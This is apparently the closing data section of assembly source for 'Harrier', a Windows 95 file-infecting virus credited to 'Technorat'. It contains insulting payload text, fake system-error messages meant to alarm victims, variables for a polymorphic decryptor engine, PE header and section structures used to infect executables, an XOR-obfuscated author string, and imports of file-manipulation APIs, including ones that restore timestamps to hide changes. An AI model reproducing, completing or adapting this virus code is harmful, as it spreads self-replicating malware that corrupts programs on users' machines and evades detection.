                db      'Greetings Goes To Gill Bates and to Her Mircosoft Windoze 95 SUCKS,', CR
                db      'and to rest lame part of world.', CR
                db      CR
                db      'Ugly Lamers Must Die!', CR
                db      CR
                db      'WHO AM I? I am The "95-TH HARRIER from Darkland" !!!', CR
                db      'i come from Dark, I invade Your PC And now i will incote your mind..', CR
                db      CR
                db      'Technorat', CR
                db      CR
                db      Ver, Release, BasedOn, CR
                db      0
                BreakCodeLine
InfGodHelp      db      'God Will Help! ;-)', 0
; -------------------------------------------------------------
                DefCodeLine
FuckMsgCounter  = 6h
FuckMessages    label   dword
                dd      FuckMsg1, FuckMsg2, FuckMsg3, FuckMsg4, FuckMsg5, FuckMsg6
                BreakCodeLine
FuckMsg1        db      'System Malfunction!', 0
FuckMsg2        db      'vxds rings overcross!', 0
FuckMsg3        db      'CPU Mode Thunking Error!', 0
FuckMsg4        db      'CPU overclocked, Cooler Device EMERGENCY!', 0
FuckMsg5        db      'Help Subsystem Is Damaged!', 0
FuckMsg6        db      'Attention! BUGS INSIDE COMPUTER, Uses Softice.', 0
; -------------------------------------------------------------
; Here will be placed the very nice files..
                BFile   BitmapFile, Harrlogo.bmp, HarrBtmpFile_sz
                BFile   InfoFile, Harrinfo.ini, HarrInfoFile_sz
MemBase         dd      ?                       ; Program base in memory
HostIP          dd      ?                       ; For returning to host
Here            dd      ?                       ; Self place in RAM
Debug           dd      0h                      ; Debugging flag
HelpCounter     dd      0h                      ; for fuckinghelp ;-)
InitOK          dd      1h                      ; Initialize semaphore:
                                                ; 0 - process performing
                                                ; 1 - must be initialized
                                                ; 2 - initialized OK.
; -------------------------------------------------------------
; Real copyright by creator.
                DefCodeLine
                irpc    Char, <(c)reated by Technorat (HACKER)>
                db      '&Char' xor 0ffh
                endm
                BreakCodeLine
; -------------------------------------------------------------

RandSeed        dd      ?
StubEntryLabel  dd      ?
ImagePlace      dd      ?
CurrentPlace    dd      ?
PolymorphSz     dd      0h                      ; The size of decryptors
StubImportPlace dd      ?
ImportPlace     dd      ?
ImportLength    dd      ?
BufferPlace     dd      ?

; -------------------------------------------------------------
; The virtual stack variables
                Var     DosHeader, 40h          ; DOS header place
                Var     FileHandle, dword       ; Generic file variables
                Var     FileAttributes, dword
                Var     FileNamePtr, dword
                Var     FileLastWrite, 8h       ; Generic file date/time
                Var     FileLastAccess, 8h
                Var     FileCreation, 8h
                Var     ProcessedBytes, dword
                Var     NewSeconds, word
                Var     PackedTime, 8h
                Var     SomePath, MaxPathLen
                Var     PEFileHeaders, dword
                Var     ImportLegal, dword      ; Import section parameters
                Var     ImportPhysOffs, dword
                Var     ImportRVA, dword
                Var     ImportFlags, dword
                Var     ImportOrder, dword
                DefCodeLine
                Var     ft_struc, 0h            ; System time description
                Var     ft_year, word
                Var     ft_month, word
                Var     ft_dayofweek, word
                Var     ft_day, word
                Var     ft_hour, word
                Var     ft_minute, word
                Var     ft_second, word
                Var     ft_milliseconds, word
                BreakCodeLine
                Var     PBaseReg, byte          ; Polymorph gen. vars
                Var     PSemReg, byte
                Var     PEnableEncr, byte
                Var     PBase, dword
                Var     PSem, dword
                Var     PXchg, dword
                Var     PMov, dword
                Var     PBaseAdd, dword
                Var     PBaseSub, dword
                Var     PAgain, dword
                Var     PAgain_e, dword
                Var     PAdd, dword
                Var     GenSz, dword            ; Polymorph link vars
                Var     GenCrSz, dword
                Var     GenTotalSz, dword
                Var     Cryptors, 2*4*16
                Var     CryptCnt, dword
                DefCodeLine
                Var     Section, 0h
SectBegin       = _VarAddr                      ; Section header description
                Var     SectName, 8h
                Var     SectVirtSize, dword
                Var     SectRVA, dword
                Var     SectPhysSize, dword
                Var     SectPhysOffs, dword
                Var     SectR, 3*4h
                Var     SectFlags, dword
SectSize        = _VarAddr-SectBegin
                BreakCodeLine
                DefCodeLine
                Var     SelfSection, 0h
SelfSectBegin   = _VarAddr                      ; Self section description
                Var     SelfSectName, 8h
                Var     SelfSectVirtSize, dword
                Var     SelfSectRVA, dword
                Var     SelfSectPhysize, dword
                Var     SelfSectPhysOffs, dword
                Var     SelfSectR, 3*4h
                Var     SelfSectFlags, dword
SelfSectSize    = _VarAddr-SelfSectBegin
                BreakCodeLine
                DefCodeLine
                Var     PEHeader, 0h
PEHeaderBegin   = _VarAddr                      ; PE header description
                Var     PE_SIGN, dword
                Var     PE_CPUTYPE, word
                Var     PE_NUMOFSES, word
                Var     PE_TIMEDATE, dword
                Var     PE_PTRTOCOFFTBL, dword
                Var     PE_COFFTBLSIZE, dword
                Var     PE_NTHDRSIZE, word
                Var     PE_FLAGS, word
                Var     PE_MAGIC, word
                Var     PE_LMAJOR, byte
                Var     PE_LMINOR, byte
                Var     PE_SIZEOFCODE, dword
                Var     PE_SIZEOFIDATA, dword
                Var     PE_SIZEOFUIDATA, dword
                Var     PE_ENTRYPOINTRVA, dword
                Var     PE_BASEOFCODE, dword
                Var     PE_BASEOFDATA, dword
                Var     PE_IMAGEBASE, dword
                Var     PE_OBJECTALIGN, dword
                Var     PE_FILALIGN, dword
                Var     PE_OSMAJOR, word
                Var     PE_OSMINOR, word
                Var     PE_USERMAJOR, word
                Var     PE_USERMINOR, word
                Var     PE_SUBSYSMAJOR, word
                Var     PE_SUBSYSMINOR, word
                Var     PE_R1, dword
                Var     PE_IMAGESIZE, dword
                Var     PE_HEADERSIZE, dword
                Var     PE_FILECHKSUM, dword
                Var     PE_SUBSYSTEM, word
                Var     PE_DLFLAGS, word
                Var     PE_STACKRESERVESZ, dword
                Var     PE_STACKCOMMITSZ, dword
                Var     PE_HEAPRESERVESZ, dword
                Var     PE_HEAPCOMMITSZ, dword
                Var     PE_LOADERFLAGS, dword
                Var     PE_NUMOFRVAANDSZ, dword
                Var     PE_EXPORTTABLERVA, dword
                Var     PE_EXPORTDATASZ, dword
                Var     PE_IMPORTTABLERVA, dword
                Var     PE_IMPORTDATASZ, dword
                Var     PE_RSRCTABLERVA, dword
                Var     PE_RSRCDATASZ, dword
                Var     PE_EXCEPTTABLERVA, dword
                Var     PE_EXCEPTDATASZ, dword
                Var     PE_SECURTABLERVA, dword
                Var     PE_SECURDATASZ, dword
                Var     PE_FIXUPTABLERVA, dword
                Var     PE_FIXUPDATASZ, dword
                Var     PE_DEBUGTABLES, dword
                Var     PE_DEBUGDATASZ, dword
                Var     PE_IMAGEDESCRVA, dword
                Var     PE_DESCRIPTIONSZ, dword
                Var     PE_MACHINESPECRVA, dword
                Var     PE_MACHINPECSZ, dword
                Var     PE_TLSRVA, dword
                Var     PE_TLSSZ, dword
                Var     PE_R0, 30h
PEHeaderSize    = _VarAddr-PEHeaderBegin
                IF PEHeaderSize ne 0f8h
                .err 'PEHeader described incorrectly!'
                ENDIF
                BreakCodeLine
                StopCode                        ; STOPCODE
                Var     VeryLargeBuffer, 0h     ; Rest of memory ;-)
; -------------------------------------------------------------
_VarAddr        = 0h
                Var     ConvertVar, 4*4         ; Tiny stack variables
                Var     SmallBuffer, 0h         ; (memory buffer)
; -------------------------------------------------------------

                StartData
                extern  MessageBoxA: proc               ; External functions
                extern  CreateFileA: proc               ; which are imported
                extern  SetFilePointer: proc            ; from some system
                extern  CloseHandle: proc               ; DLLs (providers
                extern  ReadFile: proc                  ; of these functions)
                extern  WriteFile: proc
                extern  SetFilePointer: proc
                extern  GetFileAttributesA: proc
                extern  SetFileAttributesA: proc
                extern  GetFileTime: proc
                extern  SetFileTime: proc
                extern  CopyFileA: proc
                extern  MoveFileA: proc
                extern  GetEnvironmentStringsA: proc
                extern  MessageBeep: proc
                extern  FileTimeToSystemTime: proc
                extern  SystemTimeToFileTime: proc
                extern  GetSystemTime: proc
                extern  GetSystemDirectoryA: proc
                StopData
; -------------------------------------------------------------
                end     Start
; *====================================================================*
;                       T i m e   t o   D i e !
; *====================================================================*
